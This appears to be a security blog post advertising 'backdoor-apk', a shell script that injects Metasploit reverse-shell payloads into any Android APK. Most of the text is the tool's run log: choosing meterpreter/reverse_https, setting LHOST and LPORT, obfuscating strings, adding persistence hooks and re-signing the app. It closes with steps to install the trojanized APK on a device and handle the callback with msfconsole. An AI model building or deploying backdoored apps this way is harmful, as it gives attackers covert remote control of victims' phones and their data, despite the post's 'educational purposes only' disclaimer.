Backdoor APK is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Download and Install:
Run the following command to execute backdoor-apk
________ / ______ \ || _ _ || ||| || ||| AAAAAA PPPPPPP KKK KKK |||_||_||| AAA AAA PPP PPP KKK KKK || _ _o|| (o) AAA AAA PPP PPP KKKKKK ||| || ||| AAAAAAAA PPPPPPPP KKK KKK |||_||_||| AAA AAA PPP KKK KKK ||______|| AAA AAA PPP KKK KKK /__________\ ________|__________|__________________________________________ /____________\ |____________| Dana James Traversie [*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016 [+] Android payload options: 1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 2 [?] Please enter an LHOST value: 10.6.9.31 [?] Please enter an LPORT value: 443 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file...done. [*] Decompiling RAT APK file...done. [*] Decompiling original APK file...done. [*] Merging permissions of original and payload projects...done. [*] Running proguard on RAT APK file...done. [*] Decompiling obfuscated RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Obfuscating const-string values in RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file...done. [*] Adding persistence hook in original project...done. [*] Recompiling original project with backdoor...done. [*] Generating RSA key for signing...done. [*] Signing recompiled APK...done. [*] Verifying signed artifacts...done. [*] Aligning recompiled APK...done.
Note: The recompiled APK will be found in the ‘original/dist’ directory.
Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script:
msfconsole -r backdoor-apk.rc
Latest posts by Unallocated Author (see all)
- The Digital Revolution: Ways to Drive Business Growth in the Private Education Sector - March 9, 2020
- Top Cybersecurity Trends In 2020 - February 20, 2020
- Microsoft Rolled Out Huge Patch Tuesday February With 99 Bug Fixes - February 14, 2020